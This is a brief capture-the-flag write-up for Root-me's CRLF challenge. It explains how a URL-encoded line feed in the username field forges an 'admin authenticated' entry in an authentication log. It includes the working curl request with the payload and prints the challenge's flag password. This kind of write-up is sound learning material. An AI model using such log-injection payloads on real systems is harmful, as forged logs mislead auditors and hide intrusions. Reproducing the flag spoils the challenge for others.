Root-me

CRLF

We need to inject false data in the journalisation log. This challenge is not very clear tho. It doesn’t say how exactly we’re suppose to get the flag.

So CRLF stands for Carriage Return Line Feed. It’s basically going to the next time in text. The challenge page shows a login and password input box with the Authentication log.

If we try to login with admin:admin we generate the following log

admin failed to authenticate.
admin authenticated.
guest failed to authenticate.
admin failed to authenticate.

Let’s try to logging with 12345:12345

admin failed to authenticate.
admin authenticated.
guest failed to authenticate.
admin failed to authenticate.
12345 failed to authenticate.

So if we login with admin authenticated:12345 we should be getting “admin authenticated failed to authenticate”

admin failed to authenticate.
admin authenticated.
guest failed to authenticate.
admin failed to authenticate.
12345 failed to authenticate.
admin authenticated failed to authenticate.

So let’s input a Carriage return after out login and reproduce the “admin authenticated message”. We’ll use a login with either %0A or %0D to do the line feed/Carriage return and create a “fake log”. The login will be admin authenticated.%0ARandom user:12344

So after trying a few time i noticed that the login will not convert any type of character. So we’ll have to do it via the url

curl http://challenge01.root-me.org/web-serveur/ch14/?username=admin+authenticated.%0AUser&password=12345

...
<fieldset><legend>Authentication log</legend><pre>admin failed to authenticate.
admin authenticated.
guest failed to authenticate.
admin authenticated.
User failed to authenticate.
</pre></fieldset><h3>Well done, you can validate challenge with this password : rFSP&G0p&5uAg1%</h3></body></html>

We got our password